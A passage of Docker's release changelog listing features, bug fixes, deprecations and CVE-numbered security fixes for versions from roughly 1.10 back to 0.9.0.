[#18775](https://github.com/docker/docker/pull/18775) ++ Add `--force` to `network disconnect` to force container to be disconnected from network [#19317](https://github.com/docker/docker/pull/19317) +* Support for multi-host networking using built-in overlay driver for all engine supported kernels: 3.10+ [#18775](https://github.com/docker/docker/pull/18775) +* `--link` is now supported on `docker run` for containers in user-defined network [#19229](https://github.com/docker/docker/pull/19229) +* Enhance `docker network rm` to allow removing multiple networks [#17489](https://github.com/docker/docker/pull/17489) +* Include container names in `network inspect` [#17615](https://github.com/docker/docker/pull/17615) +* Include auto-generated subnets for user-defined networks in `network inspect` [#17316](https://github.com/docker/docker/pull/17316) +* Add `--filter` flag to `network ls` to hide predefined networks [#17782](https://github.com/docker/docker/pull/17782) +* Add support for network connect/disconnect to stopped containers [#18906](https://github.com/docker/docker/pull/18906) +* Add network ID to container inspect [#19323](https://github.com/docker/docker/pull/19323) +- Fix MTU issue where Docker would not start with two or more default routes [#18108](https://github.com/docker/docker/pull/18108) +- Fix duplicate IP address for containers [#18106](https://github.com/docker/docker/pull/18106) +- Fix issue preventing sometimes docker from creating the bridge network [#19338](https://github.com/docker/docker/pull/19338) +- Do not substitute 127.0.0.1 name server when using `--net=host` [#19573](https://github.com/docker/docker/pull/19573) + +### Logging + ++ New logging driver for Splunk [#16488](https://github.com/docker/docker/pull/16488) ++ Add support for syslog over TCP+TLS [#18998](https://github.com/docker/docker/pull/18998) +* Enhance `docker logs --since` and `--until` to support nanoseconds and time [#17495](https://github.com/docker/docker/pull/17495) +* Enhance AWS logs to auto-detect region [#16640](https://github.com/docker/docker/pull/16640) + +### Volumes + ++ Add support to set the mount propagation mode for a volume [#17034](https://github.com/docker/docker/pull/17034) +* Add `ls` and `inspect` endpoints to volume plugin API [#16534](https://github.com/docker/docker/pull/16534) + Existing plugins need to make use of these new APIs to satisfy users' expectation + For that, please use the new MIME type `application/vnd.docker.plugins.v1.2+json` [#19549](https://github.com/docker/docker/pull/19549) +- Fix data not being copied to named volumes [#19175](https://github.com/docker/docker/pull/19175) +- Fix issues preventing volume drivers from being containerized [#19500](https://github.com/docker/docker/pull/19500) +- Fix `docker volumes ls --dangling=false` to now show all non-dangling volumes [#19671](https://github.com/docker/docker/pull/19671) +- Do not remove named volumes on container removal [#19568](https://github.com/docker/docker/pull/19568) +- Allow external volume drivers to host anonymous volumes [#19190](https://github.com/docker/docker/pull/19190) + +### Builder + ++ Add support for `**` in `.dockerignore` to wildcard multiple levels of directories [#17090](https://github.com/docker/docker/pull/17090) +- Fix handling of UTF-8 characters in Dockerfiles [#17055](https://github.com/docker/docker/pull/17055) +- Fix permissions problem when reading from STDIN [#19283](https://github.com/docker/docker/pull/19283) + +### Client + ++ Add support for overriding the API version to use via an `DOCKER_API_VERSION` environment-variable [#15964](https://github.com/docker/docker/pull/15964) +- Fix a bug preventing Windows clients to log in to Docker Hub [#19891](https://github.com/docker/docker/pull/19891) + +### Misc + +* systemd: Set TasksMax in addition to LimitNPROC in systemd service file [#19391](https://github.com/docker/docker/pull/19391) + +### Deprecations + +* Remove LXC support. The LXC driver was deprecated in Docker 1.8, and has now been removed [#17700](https://github.com/docker/docker/pull/17700) +* Remove `--exec-driver` daemon flag, because it is no longer in use [#17700](https://github.com/docker/docker/pull/17700) +* Remove old deprecated single-dashed long CLI flags (such as `-rm`; use `--rm` instead) [#17724](https://github.com/docker/docker/pull/17724) +* Deprecate HostConfig at API container start [#17799](https://github.com/docker/docker/pull/17799) +* Deprecate docker packages for newly EOL'd Linux distributions: Fedora 21 and Ubuntu 15.04 (Vivid) [#18794](https://github.com/docker/docker/pull/18794), [#18809](https://github.com/docker/docker/pull/18809) +* Deprecate `-f` flag for docker tag [#18350](https://github.com/docker/docker/pull/18350) + +## 1.9.1 (2015-11-21) + +### Runtime + +- Do not prevent daemon from booting if images could not be restored (#17695) +- Force IPC mount to unmount on daemon shutdown/init (#17539) +- Turn IPC unmount errors into warnings (#17554) +- Fix `docker stats` performance regression (#17638) +- Clarify cryptic error message upon `docker logs` if `--log-driver=none` (#17767) +- Fix seldom panics (#17639, #17634, #17703) +- Fix opq whiteouts problems for files with dot prefix (#17819) +- devicemapper: try defaulting to xfs instead of ext4 for performance reasons (#17903, #17918) +- devicemapper: fix displayed fs in docker info (#17974) +- selinux: only relabel if user requested so with the `z` option (#17450, #17834) +- Do not make network calls when normalizing names (#18014) + +### Client + +- Fix `docker login` on windows (#17738) +- Fix bug with `docker inspect` output when not connected to daemon (#17715) +- Fix `docker inspect -f {{.HostConfig.Dns}} somecontainer` (#17680) + +### Builder + +- Fix regression with symlink behavior in ADD/COPY (#17710) + +### Networking + +- Allow passing a network ID as an argument for `--net` (#17558) +- Fix connect to host and prevent disconnect from host for `host` network (#17476) +- Fix `--fixed-cidr` issue when gateway ip falls in ip-range and ip-range is + not the first block in the network (#17853) +- Restore deterministic `IPv6` generation from `MAC` address on default `bridge` network (#17890) +- Allow port-mapping only for endpoints created on docker run (#17858) +- Fixed an endpoint delete issue with a possible stale sbox (#18102) + +### Distribution + +- Correct parent chain in v2 push when v1Compatibility files on the disk are inconsistent (#18047) + +## 1.9.0 (2015-11-03) + +### Runtime + ++ `docker stats` now returns block IO metrics (#15005) ++ `docker stats` now details network stats per interface (#15786) ++ Add `ancestor=` filter to `docker ps --filter` flag to filter +containers based on their ancestor images (#14570) ++ Add `label=` filter to `docker ps --filter` to filter containers +based on label (#16530) ++ Add `--kernel-memory` flag to `docker run` (#14006) ++ Add `--message` flag to `docker import` allowing to specify an optional +message (#15711) ++ Add `--privileged` flag to `docker exec` (#14113) ++ Add `--stop-signal` flag to `docker run` allowing to replace the container +process stopping signal (#15307) ++ Add a new `unless-stopped` restart policy (#15348) ++ Inspecting an image now returns tags (#13185) ++ Add container size information to `docker inspect` (#15796) ++ Add `RepoTags` and `RepoDigests` field to `/images/{name:.*}/json` (#17275) +- Remove the deprecated `/container/ps` endpoint from the API (#15972) +- Send and document correct HTTP codes for `/exec//start` (#16250) +- Share shm and mqueue between containers sharing IPC namespace (#15862) +- Event stream now shows OOM status when `--oom-kill-disable` is set (#16235) +- Ensure special network files (/etc/hosts etc.) are read-only if bind-mounted +with `ro` option (#14965) +- Improve `rmi` performance (#16890) +- Do not update /etc/hosts for the default bridge network, except for links (#17325) +- Fix conflict with duplicate container names (#17389) +- Fix an issue with incorrect template execution in `docker inspect` (#17284) +- DEPRECATE `-c` short flag variant for `--cpu-shares` in docker run (#16271) + +### Client + ++ Allow `docker import` to import from local files (#11907) + +### Builder + ++ Add a `STOPSIGNAL` Dockerfile instruction allowing to set a different +stop-signal for the container process (#15307) ++ Add an `ARG` Dockerfile instruction and a `--build-arg` flag to `docker build` +that allows to add build-time environment variables (#15182) +- Improve cache miss performance (#16890) + +### Storage + +- devicemapper: Implement deferred deletion capability (#16381) + +## Networking + ++ `docker network` exits experimental and is part of standard release (#16645) ++ New network top-level concept, with associated subcommands and API (#16645) + WARNING: the API is different from the experimental API ++ Support for multiple isolated/micro-segmented networks (#16645) ++ Built-in multihost networking using VXLAN based overlay driver (#14071) ++ Support for third-party network plugins (#13424) ++ Ability to dynamically connect containers to multiple networks (#16645) ++ Support for user-defined IP address management via pluggable IPAM drivers (#16910) ++ Add daemon flags `--cluster-store` and `--cluster-advertise` for built-in nodes discovery (#16229) ++ Add `--cluster-store-opt` for setting up TLS settings (#16644) ++ Add `--dns-opt` to the daemon (#16031) +- DEPRECATE following container `NetworkSettings` fields in API v1.21: `EndpointID`, `Gateway`, + `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`, `IPPrefixLen`, `IPv6Gateway` and `MacAddress`. + Those are now specific to the `bridge` network. Use `NetworkSettings.Networks` to inspect + the networking settings of a container per network. + +### Volumes + ++ New top-level `volume` subcommand and API (#14242) +- Move API volume driver settings to host-specific config (#15798) +- Print an error message if volume name is not unique (#16009) +- Ensure volumes created from Dockerfiles always use the local volume driver +(#15507) +- DEPRECATE auto-creating missing host paths for bind mounts (#16349) + +### Logging + ++ Add `awslogs` logging driver for Amazon CloudWatch (#15495) ++ Add generic `tag` log option to allow customizing container/image +information passed to driver (e.g. show container names) (#15384) +- Implement the `docker logs` endpoint for the journald driver (#13707) +- DEPRECATE driver-specific log tags (e.g. `syslog-tag`, etc.) (#15384) + +### Distribution + ++ `docker search` now works with partial names (#16509) +- Push optimization: avoid buffering to file (#15493) +- The daemon will display progress for images that were already being pulled +by another client (#15489) +- Only permissions required for the current action being performed are requested (#) ++ Renaming trust keys (and respective environment variables) from `offline` to +`root` and `tagging` to `repository` (#16894) +- DEPRECATE trust key environment variables +`DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE` and +`DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE` (#16894) + +### Security + ++ Add SELinux profiles to the rpm package (#15832) +- Fix various issues with AppArmor profiles provided in the deb package +(#14609) +- Add AppArmor policy that prevents writing to /proc (#15571) + +## 1.8.3 (2015-10-12) + +### Distribution + +- Fix layer IDs lead to local graph poisoning (CVE-2014-8178) +- Fix manifest validation and parsing logic errors allow pull-by-digest validation bypass (CVE-2014-8179) ++ Add `--disable-legacy-registry` to prevent a daemon from using a v1 registry + +## 1.8.2 (2015-09-10) + +### Distribution + +- Fixes rare edge case of handling GNU LongLink and LongName entries. +- Fix ^C on docker pull. +- Fix docker pull issues on client disconnection. +- Fix issue that caused the daemon to panic when loggers weren't configured properly. +- Fix goroutine leak pulling images from registry V2. + +### Runtime + +- Fix a bug mounting cgroups for docker daemons running inside docker containers. +- Initialize log configuration properly. + +### Client: + +- Handle `-q` flag in `docker ps` properly when there is a default format. + +### Networking + +- Fix several corner cases with netlink. + +### Contrib + +- Fix several issues with bash completion. + +## 1.8.1 (2015-08-12) + +### Distribution + +* Fix a bug where pushing multiple tags would result in invalid images + +## 1.8.0 (2015-08-11) + +### Distribution + ++ Trusted pull, push and build, disabled by default +* Make tar layers deterministic between registries +* Don't allow deleting the image of running containers +* Check if a tag name to load is a valid digest +* Allow one character repository names +* Add a more accurate error description for invalid tag name +* Make build cache ignore mtime + +### Cli + ++ Add support for DOCKER_CONFIG/--config to specify config file dir ++ Add --type flag for docker inspect command ++ Add formatting options to `docker ps` with `--format` ++ Replace `docker -d` with new subcommand `docker daemon` +* Zsh completion updates and improvements +* Add some missing events to bash completion +* Support daemon urls with base paths in `docker -H` +* Validate status= filter to docker ps +* Display when a container is in --net=host in docker ps +* Extend docker inspect to export image metadata related to graph driver +* Restore --default-gateway{,-v6} daemon options +* Add missing unpublished ports in docker ps +* Allow duration strings in `docker events` as --since/--until +* Expose more mounts information in `docker inspect` + +### Runtime + ++ Add new Fluentd logging driver ++ Allow `docker import` to load from local files ++ Add logging driver for GELF via UDP ++ Allow to copy files from host to containers with `docker cp` ++ Promote volume drivers from experimental to master ++ Add rollover options to json-file log driver, and --log-driver-opts flag ++ Add memory swappiness tuning options +* Remove cgroup read-only flag when privileged +* Make /proc, /sys, & /dev readonly for readonly containers +* Add cgroup bind mount by default +* Overlay: Export metadata for container and image in `docker inspect` +* Devicemapper: external device activation +* Devicemapper: Compare uuid of base device on startup +* Remove RC4 from the list of registry cipher suites +* Add syslog-facility option +* LXC execdriver compatibility with recent LXC versions +* Mark LXC execriver as deprecated (to be removed with the migration to runc) + +### Plugins + +* Separate plugin sockets and specs locations +* Allow TLS connections to plugins + +### Bug fixes + +- Add missing 'Names' field to /containers/json API output +- Make `docker rmi` of dangling images safe while pulling +- Devicemapper: Change default basesize to 100G +- Go Scheduler issue with sync.Mutex and gcc +- Fix issue where Search API endpoint would panic due to empty AuthConfig +- Set image canonical names correctly +- Check dockerinit only if lxc driver is used +- Fix ulimit usage of nproc +- Always attach STDIN if -i,--interactive is specified +- Show error messages when saving container state fails +- Fixed incorrect assumption on --bridge=none treated as disable network +- Check for invalid port specifications in host configuration +- Fix endpoint leave failure for --net=host mode +- Fix goroutine leak in the stats API if the container is not running +- Check for apparmor file before reading it +- Fix DOCKER_TLS_VERIFY being ignored +- Set umask to the default on startup +- Correct the message of pause and unpause a non-running container +- Adjust disallowed CpuShares in container creation +- ZFS: correctly apply selinux context +- Display empty string instead of when IP opt is nil +- `docker kill` returns error when container is not running +- Fix COPY/ADD quoted/json form +- Fix goroutine leak on logs -f with no output +- Remove panic in nat package on invalid hostport +- Fix container linking in Fedora 22 +- Fix error caused using default gateways outside of the allocated range +- Format times in inspect command with a template as RFC3339Nano +- Make registry client to accept 2xx and 3xx http status responses as successful +- Fix race issue that caused the daemon to crash with certain layer downloads failed in a specific order. +- Fix error when the docker ps format was not valid. +- Remove redundant ip forward check. +- Fix issue trying to push images to repository mirrors. +- Fix error cleaning up network entrypoints when there is an initialization issue. + +## 1.7.1 (2015-07-14) + +#### Runtime + +- Fix default user spawning exec process with `docker exec` +- Make `--bridge=none` not to configure the network bridge +- Publish networking stats properly +- Fix implicit devicemapper selection with static binaries +- Fix socket connections that hung intermittently +- Fix bridge interface creation on CentOS/RHEL 6.6 +- Fix local dns lookups added to resolv.conf +- Fix copy command mounting volumes +- Fix read/write privileges in volumes mounted with --volumes-from + +#### Remote API + +- Fix unmarshalling of Command and Entrypoint +- Set limit for minimum client version supported +- Validate port specification +- Return proper errors when attach/reattach fail + +#### Distribution + +- Fix pulling private images +- Fix fallback between registry V2 and V1 + +## 1.7.0 (2015-06-16) + +#### Runtime ++ Experimental feature: support for out-of-process volume plugins +* The userland proxy can be disabled in favor of hairpin NAT using the daemon’s `--userland-proxy=false` flag +* The `exec` command supports the `-u|--user` flag to specify the new process owner ++ Default gateway for containers can be specified daemon-wide using the `--default-gateway` and `--default-gateway-v6` flags ++ The CPU CFS (Completely Fair Scheduler) quota can be set in `docker run` using `--cpu-quota` ++ Container block IO can be controlled in `docker run` using`--blkio-weight` ++ ZFS support ++ The `docker logs` command supports a `--since` argument ++ UTS namespace can be shared with the host with `docker run --uts=host` + +#### Quality +* Networking stack was entirely rewritten as part of the libnetwork effort +* Engine internals refactoring +* Volumes code was entirely rewritten to support the plugins effort ++ Sending SIGUSR1 to a daemon will dump all goroutines stacks without exiting + +#### Build ++ Support ${variable:-value} and ${variable:+value} syntax for environment variables ++ Support resource management flags `--cgroup-parent`, `--cpu-period`, `--cpu-quota`, `--cpuset-cpus`, `--cpuset-mems` ++ git context changes with branches and directories +* The .dockerignore file support exclusion rules + +#### Distribution ++ Client support for v2 mirroring support for the official registry + +#### Bugfixes +* Firewalld is now supported and will automatically be used when available +* mounting --device recursively + +## 1.6.2 (2015-05-13) + +#### Runtime +- Revert change prohibiting mounting into /sys + +## 1.6.1 (2015-05-07) + +#### Security +- Fix read/write /proc paths (CVE-2015-3630) +- Prohibit VOLUME /proc and VOLUME / (CVE-2015-3631) +- Fix opening of file-descriptor 1 (CVE-2015-3627) +- Fix symlink traversal on container respawn allowing local privilege escalation (CVE-2015-3629) +- Prohibit mount of /sys + +#### Runtime +- Update AppArmor policy to not allow mounts + +## 1.6.0 (2015-04-07) + +#### Builder ++ Building images from an image ID ++ Build containers with resource constraints, ie `docker build --cpu-shares=100 --memory=1024m...` ++ `commit --change` to apply specified Dockerfile instructions while committing the image ++ `import --change` to apply specified Dockerfile instructions while importing the image ++ Builds no longer continue in the background when canceled with CTRL-C + +#### Client ++ Windows Support + +#### Runtime ++ Container and image Labels ++ `--cgroup-parent` for specifying a parent cgroup to place container cgroup within ++ Logging drivers, `json-file`, `syslog`, or `none` ++ Pulling images by ID ++ `--ulimit` to set the ulimit on a container ++ `--default-ulimit` option on the daemon which applies to all created containers (and overwritten by `--ulimit` on run) + +## 1.5.0 (2015-02-10) + +#### Builder ++ Dockerfile to use for a given `docker build` can be specified with the `-f` flag +* Dockerfile and .dockerignore files can be themselves excluded as part of the .dockerignore file, thus preventing modifications to these files invalidating ADD or COPY instructions cache +* ADD and COPY instructions accept relative paths +* Dockerfile `FROM scratch` instruction is now interpreted as a no-base specifier +* Improve performance when exposing a large number of ports + +#### Hack ++ Allow client-side only integration tests for Windows +* Include docker-py integration tests against Docker daemon as part of our test suites + +#### Packaging ++ Support for the new version of the registry HTTP API +* Speed up `docker push` for images with a majority of already existing layers +- Fixed contacting a private registry through a proxy + +#### Remote API ++ A new endpoint will stream live container resource metrics and can be accessed with the `docker stats` command ++ Containers can be renamed using the new `rename` endpoint and the associated `docker rename` command +* Container `inspect` endpoint show the ID of `exec` commands running in this container +* Container `inspect` endpoint show the number of times Docker auto-restarted the container +* New types of event can be streamed by the `events` endpoint: ‘OOM’ (container died with out of memory), ‘exec_create’, and ‘exec_start' +- Fixed returned string fields which hold numeric characters incorrectly omitting surrounding double quotes + +#### Runtime ++ Docker daemon has full IPv6 support ++ The `docker run` command can take the `--pid=host` flag to use the host PID namespace, which makes it possible for example to debug host processes using containerized debugging tools ++ The `docker run` command can take the `--read-only` flag to make the container’s root filesystem mounted as readonly, which can be used in combination with volumes to force a container’s processes to only write to locations that will be persisted ++ Container total memory usage can be limited for `docker run` using the `--memory-swap` flag +* Major stability improvements for devicemapper storage driver +* Better integration with host system: containers will reflect changes to the host's `/etc/resolv.conf` file when restarted +* Better integration with host system: per-container iptable rules are moved to the DOCKER chain +- Fixed container exiting on out of memory to return an invalid exit code + +#### Other +* The HTTP_PROXY, HTTPS_PROXY, and NO_PROXY environment variables are properly taken into account by the client when connecting to the Docker daemon + +## 1.4.1 (2014-12-15) + +#### Runtime +- Fix issue with volumes-from and bind mounts not being honored after create + +## 1.4.0 (2014-12-11) + +#### Notable Features since 1.3.0 ++ Set key=value labels to the daemon (displayed in `docker info`), applied with + new `-label` daemon flag ++ Add support for `ENV` in Dockerfile of the form: + `ENV name=value name2=value2...` ++ New Overlayfs Storage Driver ++ `docker info` now returns an `ID` and `Name` field ++ Filter events by event name, container, or image ++ `docker cp` now supports copying from container volumes +- Fixed `docker tag`, so it honors `--force` when overriding a tag for existing + image. + +## 1.3.3 (2014-12-11) + +#### Security +- Fix path traversal vulnerability in processing of absolute symbolic links (CVE-2014-9356) +- Fix decompression of xz image archives, preventing privilege escalation (CVE-2014-9357) +- Validate image IDs (CVE-2014-9358) + +#### Runtime +- Fix an issue when image archives are being read slowly + +#### Client +- Fix a regression related to stdin redirection +- Fix a regression with `docker cp` when destination is the current directory + +## 1.3.2 (2014-11-20) + +#### Security +- Fix tar breakout vulnerability +* Extractions are now sandboxed chroot +- Security options are no longer committed to images + +#### Runtime +- Fix deadlock in `docker ps -f exited=1` +- Fix a bug when `--volumes-from` references a container that failed to start + +#### Registry ++ `--insecure-registry` now accepts CIDR notation such as 10.1.0.0/16 +* Private registries whose IPs fall in the 127.0.0.0/8 range do no need the `--insecure-registry` flag +- Skip the experimental registry v2 API when mirroring is enabled + +## 1.3.1 (2014-10-28) + +#### Security +* Prevent fallback to SSL protocols < TLS 1.0 for client, daemon and registry ++ Secure HTTPS connection to registries with certificate verification and without HTTP fallback unless `--insecure-registry` is specified + +#### Runtime +- Fix issue where volumes would not be shared + +#### Client +- Fix issue with `--iptables=false` not automatically setting `--ip-masq=false` +- Fix docker run output to non-TTY stdout + +#### Builder +- Fix escaping `$` for environment variables +- Fix issue with lowercase `onbuild` Dockerfile instruction +- Restrict environment variable expansion to `ENV`, `ADD`, `COPY`, `WORKDIR`, `EXPOSE`, `VOLUME` and `USER` + +## 1.3.0 (2014-10-14) + +#### Notable features since 1.2.0 ++ Docker `exec` allows you to run additional processes inside existing containers ++ Docker `create` gives you the ability to create a container via the CLI without executing a process ++ `--security-opts` options to allow user to customize container labels and apparmor profiles ++ Docker `ps` filters +- Wildcard support to COPY/ADD ++ Move production URLs to get.docker.com from get.docker.io ++ Allocate IP address on the bridge inside a valid CIDR ++ Use drone.io for PR and CI testing ++ Ability to setup an official registry mirror ++ Ability to save multiple images with docker `save` + +## 1.2.0 (2014-08-20) + +#### Runtime ++ Make /etc/hosts /etc/resolv.conf and /etc/hostname editable at runtime ++ Auto-restart containers using policies ++ Use /var/lib/docker/tmp for large temporary files ++ `--cap-add` and `--cap-drop` to tweak what linux capability you want ++ `--device` to use devices in containers + +#### Client ++ `docker search` on private registries ++ Add `exited` filter to `docker ps --filter` +* `docker rm -f` now kills instead of stop ++ Support for IPv6 addresses in `--dns` flag + +#### Proxy ++ Proxy instances in separate processes +* Small bug fix on UDP proxy + +## 1.1.2 (2014-07-23) + +#### Runtime ++ Fix port allocation for existing containers ++ Fix containers restart on daemon restart + +#### Packaging ++ Fix /etc/init.d/docker issue on Debian + +## 1.1.1 (2014-07-09) + +#### Builder +* Fix issue with ADD + +## 1.1.0 (2014-07-03) + +#### Notable features since 1.0.1 ++ Add `.dockerignore` support ++ Pause containers during `docker commit` ++ Add `--tail` to `docker logs` + +#### Builder ++ Allow a tar file as context for `docker build` +* Fix issue with white-spaces and multi-lines in `Dockerfiles` + +#### Runtime +* Overall performance improvements +* Allow `/` as source of `docker run -v` +* Fix port allocation +* Fix bug in `docker save` +* Add links information to `docker inspect` + +#### Client +* Improve command line parsing for `docker commit` + +#### Remote API +* Improve status code for the `start` and `stop` endpoints + +## 1.0.1 (2014-06-19) + +#### Notable features since 1.0.0 +* Enhance security for the LXC driver + +#### Builder +* Fix `ONBUILD` instruction passed to grandchildren + +#### Runtime +* Fix events subscription +* Fix /etc/hostname file with host networking +* Allow `-h` and `--net=none` +* Fix issue with hotplug devices in `--privileged` + +#### Client +* Fix artifacts with events +* Fix a panic with empty flags +* Fix `docker cp` on Mac OS X + +#### Miscellaneous +* Fix compilation on Mac OS X +* Fix several races + +## 1.0.0 (2014-06-09) + +#### Notable features since 0.12.0 +* Production support + +## 0.12.0 (2014-06-05) + +#### Notable features since 0.11.0 +* 40+ various improvements to stability, performance and usability +* New `COPY` Dockerfile instruction to allow copying a local file from the context into the container without ever extracting if the file is a tar file +* Inherit file permissions from the host on `ADD` +* New `pause` and `unpause` commands to allow pausing and unpausing of containers using cgroup freezer +* The `images` command has a `-f`/`--filter` option to filter the list of images +* Add `--force-rm` to clean up after a failed build +* Standardize JSON keys in Remote API to CamelCase +* Pull from a docker run now assumes `latest` tag if not specified +* Enhance security on Linux capabilities and device nodes + +## 0.11.1 (2014-05-07) + +#### Registry +- Fix push and pull to private registry + +## 0.11.0 (2014-05-07) + +#### Notable features since 0.10.0 + +* SELinux support for mount and process labels +* Linked containers can be accessed by hostname +* Use the net `--net` flag to allow advanced network configuration such as host networking so that containers can use the host's network interfaces +* Add a ping endpoint to the Remote API to do healthchecks of your docker daemon +* Logs can now be returned with an optional timestamp +* Docker now works with registries that support SHA-512 +* Multiple registry endpoints are supported to allow registry mirrors + +## 0.10.0 (2014-04-08) + +#### Builder +- Fix printing multiple messages on a single line. Fixes broken output during builds. +- Follow symlinks inside container's root for ADD build instructions. +- Fix EXPOSE caching. + +#### Documentation +- Add the new options of `docker ps` to the documentation. +- Add the options of `docker restart` to the documentation. +- Update daemon docs and help messages for --iptables and --ip-forward. +- Updated apt-cacher-ng docs example. +- Remove duplicate description of --mtu from docs. +- Add missing -t and -v for `docker images` to the docs. +- Add fixes to the cli docs. +- Update libcontainer docs. +- Update images in docs to remove references to AUFS and LXC. +- Update the nodejs_web_app in the docs to use the new epel RPM address. +- Fix external link on security of containers. +- Update remote API docs. +- Add image size to history docs. +- Be explicit about binding to all interfaces in redis example. +- Document DisableNetwork flag in the 1.10 remote api. +- Document that `--lxc-conf` is lxc only. +- Add chef usage documentation. +- Add example for an image with multiple for `docker load`. +- Explain what `docker run -a` does in the docs. + +#### Contrib +- Add variable for DOCKER_LOGFILE to sysvinit and use append instead of overwrite in opening the logfile. +- Fix init script cgroup mounting workarounds to be more similar to cgroupfs-mount and thus work properly. +- Remove inotifywait hack from the upstart host-integration example because it's not necessary any more. +- Add check-config script to contrib. +- Fix fish shell completion. + +#### Hack +* Clean up "go test" output from "make test" to be much more readable/scannable. +* Exclude more "definitely not unit tested Go source code" directories from hack/make/test. ++ Generate md5 and sha256 hashes when building, and upload them via hack/release.sh. +- Include contributed completions in Ubuntu PPA. ++ Add cli integration tests. +* Add tweaks to the hack scripts to make them simpler. + +#### Remote API ++ Add TLS auth support for API. +* Move git clone from daemon to client. +- Fix content-type detection in docker cp. +* Split API into 2 go packages. + +#### Runtime +* Support hairpin NAT without going through Docker server. +- devicemapper: succeed immediately when removing non-existent devices. +- devicemapper: improve handling of devicemapper devices (add per device lock, increase sleep time and unlock while sleeping). +- devicemapper: increase timeout in waitClose to 10 seconds. +- devicemapper: ensure we shut down thin pool cleanly. +- devicemapper: pass info, rather than hash to activateDeviceIfNeeded, deactivateDevice, setInitialized, deleteDevice. +- devicemapper: avoid AB-BA deadlock. +- devicemapper: make shutdown better/faster. +- improve alpha sorting in mflag. +- Remove manual http cookie management because the cookiejar is being used. +- Use BSD raw mode on Darwin. Fixes nano, tmux and others. +- Add FreeBSD support for the client. +- Merge auth package into registry. +- Add deprecation warning for -t on `docker pull`. +- Remove goroutine leak on error. +- Update parseLxcInfo to comply with new lxc1.0 format. +- Fix attach exit on darwin. +- Improve deprecation message. +- Retry to retrieve the layer metadata up to 5 times for `docker pull`. +- Only unshare the mount namespace for execin. +- Merge existing config when committing. +- Disable daemon startup timeout. +- Fix issue #4681: add loopback interface when networking is disabled. +- Add failing test case for issue #4681. +- Send SIGTERM to child, instead of SIGKILL. +- Show the driver and the kernel version in `docker info` even when not in debug mode. +- Always symlink /dev/ptmx for libcontainer. This fixes console related problems. +- Fix issue caused by the absence of /etc/apparmor.d. +- Don't leave empty cidFile behind when failing to create the container. +- Mount cgroups automatically if they're not mounted already. +- Use mock for search tests. +- Update to double-dash everywhere. +- Move .dockerenv parsing to lxc driver. +- Move all bind-mounts in the container inside the namespace. +- Don't use separate bind mount for container. +- Always symlink /dev/ptmx for libcontainer. +- Don't kill by pid for other drivers. +- Add initial logging to libcontainer. +* Sort by port in `docker ps`. +- Move networking drivers into runtime top level package. ++ Add --no-prune to `docker rmi`. ++ Add time since exit in `docker ps`. +- graphdriver: add build tags. +- Prevent allocation of previously allocated ports & prevent improve port allocation. +* Add support for --since/--before in `docker ps`. +- Clean up container stop. ++ Add support for configurable dns search domains. +- Add support for relative WORKDIR instructions. +- Add --output flag for docker save. +- Remove duplication of DNS entries in config merging. +- Add cpuset.cpus to cgroups and native driver options. +- Remove docker-ci. +- Promote btrfs. btrfs is no longer considered experimental. +- Add --input flag to `docker load`. +- Return error when existing bridge doesn't match IP address. +- Strip comments before parsing line continuations to avoid interpreting instructions as comments. +- Fix TestOnlyLoopbackExistsWhenUsingDisableNetworkOption to ignore "DOWN" interfaces. +- Add systemd implementation of cgroups and make containers show up as systemd units. +- Fix commit and import when no repository is specified. +- Remount /var/lib/docker as --private to fix scaling issue. +- Use the environment's proxy when pinging the remote registry. +- Reduce error level from harmless errors. +* Allow --volumes-from to be individual files. +- Fix expanding buffer in StdCopy. +- Set error regardless of attach or stdin. This fixes #3364. +- Add support for --env-file to load environment variables from files. +- Symlink /etc/mtab and /proc/mounts. +- Allow pushing a single tag. +- Shut down containers cleanly at shutdown and wait forever for the containers to shut down. This makes container shutdown on daemon shutdown work properly via SIGTERM. +- Don't throw error when starting an already running container. +- Fix dynamic port allocation limit. +- remove setupDev from libcontainer. +- Add API version to `docker version`. +- Return correct exit code when receiving signal and make SIGQUIT quit without cleanup. +- Fix --volumes-from mount failure. +- Allow non-privileged containers to create device nodes. +- Skip login tests because of external dependency on a hosted service. +- Deprecate `docker images --tree` and `docker images --viz`. +- Deprecate `docker insert`. +- Include base abstraction for apparmor. This fixes some apparmor related problems on Ubuntu 14.04. +- Add specific error message when hitting 401 over HTTP on push. +- Fix absolute volume check. +- Remove volumes-from from the config. +- Move DNS options to hostconfig. +- Update the apparmor profile for libcontainer. +- Add deprecation notice for `docker commit -run`. + +## 0.9.1 (2014-03-24) + +#### Builder +- Fix printing multiple messages on a single line. Fixes broken output during builds. + +#### Documentation +- Fix external link on security of containers. + +#### Contrib +- Fix init script cgroup mounting workarounds to be more similar to cgroupfs-mount and thus work properly. +- Add variable for DOCKER_LOGFILE to sysvinit and use append instead of overwrite in opening the logfile. + +#### Hack +- Generate md5 and sha256 hashes when building, and upload them via hack/release.sh. + +#### Remote API +- Fix content-type detection in `docker cp`. + +#### Runtime +- Use BSD raw mode on Darwin. Fixes nano, tmux and others. +- Only unshare the mount namespace for execin. +- Retry to retrieve the layer metadata up to 5 times for `docker pull`. +- Merge existing config when committing. +- Fix panic in monitor. +- Disable daemon startup timeout. +- Fix issue #4681: add loopback interface when networking is disabled. +- Add failing test case for issue #4681. +- Send SIGTERM to child, instead of SIGKILL. +- Show the driver and the kernel version in `docker info` even when not in debug mode. +- Always symlink /dev/ptmx for libcontainer. This fixes console related problems. +- Fix issue caused by the absence of /etc/apparmor.d. +- Don't leave empty cidFile behind when failing to create the container. +- Improve deprecation message. +- Fix attach exit on darwin. +- devicemapper: improve handling of devicemapper devices (add per device lock, increase sleep time, unlock while sleeping). +- devicemapper: succeed immediately when removing non-existent devices. +- devicemapper: increase timeout in waitClose to 10 seconds. +- Remove goroutine leak on error. +- Update parseLxcInfo to comply with new lxc1.0 format. + +## 0.9.0 (2014-03-10) + +#### Builder +- Avoid extra mount/unmount during build. This fixes mount/unmount related errors during build. +- Add error to docker build --rm. This adds missing error handling. +- Forbid chained onbuild, `onbuild from` and `onbuild maintainer` triggers. +- Make `--rm` the default for `docker build`. + +#### Documentation +- Download the docker client binary for Mac over https. +- Update the titles of the install instructions & descriptions. +* Add instructions for upgrading boot2docker. +* Add port forwarding example in OS X install docs. +- Attempt to disentangle repository and registry. +- Update docs to explain more about `docker ps`. +- Update sshd example to use a Dockerfile. +- Rework some examples, including the Python examples. +- Update docs to include instructions for a container's lifecycle. +- Update docs documentation to discuss the docs branch. +- Don't skip cert check for an example & use HTTPS. +- 